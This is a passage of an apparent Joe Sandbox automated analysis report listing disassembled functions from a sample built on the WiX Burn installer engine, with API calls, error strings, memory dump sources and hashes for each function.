                                                                                                                                                                                                                                                                            • API String ID: 1452528299-33012345
                                                                                                                                                                                                                                                                            • Opcode ID: 383ac039d48e9a381fa22509adbf0cf8d119ad48b241de9b1325c9d3088d313d
                                                                                                                                                                                                                                                                            • Instruction ID: 5d8cf01ace77d95b84c2a969aac4c8fad4c7ab53b65a1f10128579676543f2df
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 383ac039d48e9a381fa22509adbf0cf8d119ad48b241de9b1325c9d3088d313d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8E31EC73B40A25B7EB315A9A8C4AF6F7E5CEB42B50F120551FE04FF1C2E6749D009692
                                                                                                                                                                                                                                                                            Function 0093AABF Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 101COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: Failed to concatenate string to pre-init buffer$Failed to get length of raw string$Failed to write output to log: %ls - %hs$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\logutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 0-492501437
                                                                                                                                                                                                                                                                            • Opcode ID: d998e63636b3f9c87c130923036b7b189d59b3f6daea836f85dbe194e7b974b9
                                                                                                                                                                                                                                                                            • Instruction ID: bc9ff2555928e50aeeed138476c56b4dd8117bfed574002b759f5bb91f85c4b3
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d998e63636b3f9c87c130923036b7b189d59b3f6daea836f85dbe194e7b974b9
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4F212873A4022477D721D6998C4AFBFBA7DEB85B60F010205F644FB1C0E7749D00DAA2
                                                                                                                                                                                                                                                                            Function 0093D0CB Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 142stringCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000003,00000000,00000000,?,?,?,0093CDF4), ref: 0093D224
                                                                                                                                                                                                                                                                              • Part of subcall function 008E55C9: GetProcessHeap.KERNEL32(00000000,?,?,?,0090DE2B,?), ref: 008E55D3
                                                                                                                                                                                                                                                                              • Part of subcall function 008E55C9: RtlFreeHeap.NTDLL(00000000,?,?,0090DE2B,?), ref: 008E55DA
                                                                                                                                                                                                                                                                              • Part of subcall function 008E55C9: GetLastError.KERNEL32(?,?,0090DE2B,?), ref: 008E55E4
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Heap$ErrorFreeLastProcesslstrlen
                                                                                                                                                                                                                                                                            • String ID: Failed to allocate buffer for raw registry value.$Failed to expand registry value: %ls$Failed to get size of raw registry value.$Failed to read raw registry value.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1805815496-598890354
                                                                                                                                                                                                                                                                            • Opcode ID: 54a2e78b2714f0ed500863343368c02a40462fa285b5244f94653949fc7bda5f
                                                                                                                                                                                                                                                                            • Instruction ID: f7aa3560dcdc0b238653b6eacaa26ca97f12d43a62d7a394eba3ce94421a2496
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 54a2e78b2714f0ed500863343368c02a40462fa285b5244f94653949fc7bda5f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A041D472A41225BBDF219BA8DC5AF9F76B8EF86754F104050F914AB180D3B4DD41CFA1
                                                                                                                                                                                                                                                                            Function 00942B2E Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 117fileCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ReadFile.KERNELBASE(?,?,00000000,?,00000000,?), ref: 00942BBF
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FileRead
                                                                                                                                                                                                                                                                            • String ID: Failed to read from source.$Failed to write to target.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\fileutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 2738559852-3357669501
                                                                                                                                                                                                                                                                            • Opcode ID: 46a8dde15905f8f390664c9ea3e138136e5052df23e0d26b1442388229af4832
                                                                                                                                                                                                                                                                            • Instruction ID: cfc4ba507cf1da71e57c9d0cf65c8ba41184a945f048de05ab74b56a119c9bf4
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 46a8dde15905f8f390664c9ea3e138136e5052df23e0d26b1442388229af4832
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B341A671A002699BDB21CF14CC85FEE77A8FF45742F4141AAB949E7240D7B4DDC49BA0
                                                                                                                                                                                                                                                                            Function 0090E0A0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 109COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SetFilePointerEx.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?), ref: 0090E158
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?), ref: 0090E162
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                                            • String ID: Failed to move file pointer 0x%x bytes.$Invalid seek type.$d:\a\wix4\wix4\src\burn\engine\cabextract.cpp
                                                                                                                                                                                                                                                                            • API String ID: 2976181284-2861879377
                                                                                                                                                                                                                                                                            • Opcode ID: 8cc197936ccb3228eac2ad12363053bc878f0ac0c3c8595a76e71889116de737
                                                                                                                                                                                                                                                                            • Instruction ID: 79ee5b003b56aa357870047cc3d5c39397fe4e22fc1f8d4b1c45134cc6c82d1c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8cc197936ccb3228eac2ad12363053bc878f0ac0c3c8595a76e71889116de737
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DE31A375A0421ABFCB10DFA8DC85EA9B769FB08754F048A15B914E72D1E370ED10CB90
                                                                                                                                                                                                                                                                            Function 009465AE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 67COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to combine logging path with root path., xrefs: 009465CE
                                                                                                                                                                                                                                                                            • SOFTWARE\Policies\, xrefs: 009465BE
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\polcutil.cpp, xrefs: 009465DD, 00946635
                                                                                                                                                                                                                                                                            • Failed to open policy registry key., xrefs: 00946626
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: Failed to combine logging path with root path.$Failed to open policy registry key.$SOFTWARE\Policies\$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\polcutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 0-3658365009
                                                                                                                                                                                                                                                                            • Opcode ID: 9213ea371339498a5d785317a9f3ee93e4b8c98359e2fc512c8378febe92c140
                                                                                                                                                                                                                                                                            • Instruction ID: 8e88ee419ce45d8aaf870b69d923b48b3a6e8dd204a16e5663f5c6521fd4abaa
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9213ea371339498a5d785317a9f3ee93e4b8c98359e2fc512c8378febe92c140
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FD113AB3A40321BBDB316694CC0FF9E7A6CDF43B50F124010B904BA091D6B58E10DAD7
                                                                                                                                                                                                                                                                            Function 0093BF20 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 61COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 008E174A: WaitForSingleObject.KERNEL32(?,0090EA2A,00000000,?,0090EA2A,?,000000FF), ref: 008E1756
                                                                                                                                                                                                                                                                            • GetExitCodeProcess.KERNELBASE(0094E7E8,00000000), ref: 0093BF6C
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,008E768F,?,000000FF,?,?,?,00000001), ref: 0093BF76
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CodeErrorExitLastObjectProcessSingleWait
                                                                                                                                                                                                                                                                            • String ID: Failed to get process return code.$Failed to wait for process to complete.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\procutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1402617016-1146304469
                                                                                                                                                                                                                                                                            • Opcode ID: d4b20a03f92188629d5d761de9629760d1edf8e880fda55bb96dbd6dbb58bed6
                                                                                                                                                                                                                                                                            • Instruction ID: ff7cfb368d6760624c4037cf86b50f41360edee5318b15ec35ea800e4abd6bd0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d4b20a03f92188629d5d761de9629760d1edf8e880fda55bb96dbd6dbb58bed6
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5801C43BB4022977DB317559DC0AFAF295CEF45B94F054125FF08EA191E3648C509EE1
                                                                                                                                                                                                                                                                            Function 00945CB8 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 59COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • UuidCreate.RPCRT4(?), ref: 00945CDB
                                                                                                                                                                                                                                                                            • StringFromGUID2.OLE32(?,00000000,00000027), ref: 00945D02
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateFromStringUuid
                                                                                                                                                                                                                                                                            • String ID: Failed to convert guid into string.$UuidCreate failed.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\guidutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 4041566446-2208176607
                                                                                                                                                                                                                                                                            • Opcode ID: 272b236f601fa901b130a6db71c4ab93135f07b1af61f4f9d897ccc79c6a45a2
                                                                                                                                                                                                                                                                            • Instruction ID: 6b40f9796482bcec9fbd10f8037a65a7e4008f0ad193d60ed8c9cade52a4c54d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 272b236f601fa901b130a6db71c4ab93135f07b1af61f4f9d897ccc79c6a45a2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8301D676B44708B7DB1096E9DC4EFAF77ACDB89B15F410425F605FB1C2E5608D0486A1
                                                                                                                                                                                                                                                                            Function 008E1121 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 53fileCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateFileW.KERNELBASE(?,80000000,00000005,00000000,00000003,00000080,00000000), ref: 008E1136
                                                                                                                                                                                                                                                                              • Part of subcall function 008E79D1: lstrlenW.KERNEL32(burn.clean.room,?,?,?,008E1144,?,?,00000000), ref: 008E79EF
                                                                                                                                                                                                                                                                              • Part of subcall function 008E79D1: CompareStringW.KERNEL32(0000007F,00000001,?,0000000F,burn.clean.room,0000000F,?,?,?,008E1144,?,?,00000000), ref: 008E7A1F
                                                                                                                                                                                                                                                                              • Part of subcall function 008E1651: HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,008E114D), ref: 008E1658
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,?,?,?), ref: 008E1191
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to run application., xrefs: 008E116F
                                                                                                                                                                                                                                                                            • D:\a\wix4\wix4\src\burn\stub\stub.cpp, xrefs: 008E117E
                                                                                                                                                                                                                                                                            • .Wu@1Wu, xrefs: 008E1191
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseCompareCreateFileHandleHeapInformationStringlstrlen
                                                                                                                                                                                                                                                                            • String ID: D:\a\wix4\wix4\src\burn\stub\stub.cpp$Failed to run application.$.Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 4127744429-2265392950
                                                                                                                                                                                                                                                                            • Opcode ID: a7cbb6d0ef07ca562fcff152bc76256a86125e2c4f9d8b8e73399f4513a50263
                                                                                                                                                                                                                                                                            • Instruction ID: 6c6c58bdf4f3e09f0754c385a45644282a1e244b8704a9806e6f4d195cf3c8af
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a7cbb6d0ef07ca562fcff152bc76256a86125e2c4f9d8b8e73399f4513a50263
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D501D832A4136576EF226A6AAC0EFAE3925FF43B14F104114FB01F62D1DA709800D661
                                                                                                                                                                                                                                                                            Function 008E7D90 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 163COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to run RunOnce mode., xrefs: 008E7DDE
                                                                                                                                                                                                                                                                            • Failed to run per-machine mode., xrefs: 008E7E48
                                                                                                                                                                                                                                                                            • Invalid run mode., xrefs: 008E7DA3
                                                                                                                                                                                                                                                                            • Failed to run embedded mode., xrefs: 008E7E12
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: Failed to run RunOnce mode.$Failed to run embedded mode.$Failed to run per-machine mode.$Invalid run mode.
                                                                                                                                                                                                                                                                            • API String ID: 0-2744884814
                                                                                                                                                                                                                                                                            • Opcode ID: 8585a21b763225c3aa43525f8b220bdc764682aa61b3208ea202821d33cc5144
                                                                                                                                                                                                                                                                            • Instruction ID: 9e98f0d21c55baefde62c797c4c3c916d5c9022d28c63408f54f471c5fd25a3a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8585a21b763225c3aa43525f8b220bdc764682aa61b3208ea202821d33cc5144
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1251A5309456AAE6EB31AA65CC06FAE76B8FF42704F0441E5F948F21C1DF708D848F92
                                                                                                                                                                                                                                                                            Function 008E7B87 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 132COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CoInitializeEx.COMBASE(00000000,00000000,?,?,00000000,?,?,00000003,00000000,008E6570,00000000,?,?,?,?,?), ref: 008E7BB5
                                                                                                                                                                                                                                                                              • Part of subcall function 0090D137: CloseHandle.KERNEL32(00000000,?,00000001,?,?), ref: 0090D2CD
                                                                                                                                                                                                                                                                              • Part of subcall function 0090D137: CloseHandle.KERNEL32(00000000,?), ref: 0090D2E2
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\engine.cpp, xrefs: 008E7B31
                                                                                                                                                                                                                                                                            • Failed to initialize COM., xrefs: 008E7BC1
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseHandle$Initialize
                                                                                                                                                                                                                                                                            • String ID: Failed to initialize COM.$d:\a\wix4\wix4\src\burn\engine\engine.cpp
                                                                                                                                                                                                                                                                            • API String ID: 4100669059-4079876660
                                                                                                                                                                                                                                                                            • Opcode ID: 41faf8b0e849b080bea8e51cf211eb45e359269738bc81f199797ee6261010a4
                                                                                                                                                                                                                                                                            • Instruction ID: cc59d2dd3d21b73a88ea99f801571104b18093a7beed88aaa8a058a929b0a80a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 41faf8b0e849b080bea8e51cf211eb45e359269738bc81f199797ee6261010a4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 894160319056A9DADB30B7A5CC06BAD72B8FF42315F1840E5A548E2182DF709E84CFA2
                                                                                                                                                                                                                                                                            Function 00946814 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 90registryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000006,00000006,00000070,00000000,00000000,00000000,00000000,00000000,?,?,008FC9FA,WiX\Burn,EngineWorkingDirectory,00000000), ref: 009468C4
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\polcutil.cpp, xrefs: 00946845, 009468A5
                                                                                                                                                                                                                                                                            • Failed to open policy key: %ls, name: %ls, xrefs: 00946896
                                                                                                                                                                                                                                                                            • Failed to open policy key: %ls, xrefs: 00946839
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Close
                                                                                                                                                                                                                                                                            • String ID: Failed to open policy key: %ls$Failed to open policy key: %ls, name: %ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\polcutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3535843008-3938230626
                                                                                                                                                                                                                                                                            • Opcode ID: 552b9a6600cf543e4ff1765d558824f3ebe30a9ee277a8f611042881fd82af9d
                                                                                                                                                                                                                                                                            • Instruction ID: e5e1ac148e452c0f931828f80fc2ee2aebbf73f7fce47ac90b3f4b2228dce10c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 552b9a6600cf543e4ff1765d558824f3ebe30a9ee277a8f611042881fd82af9d
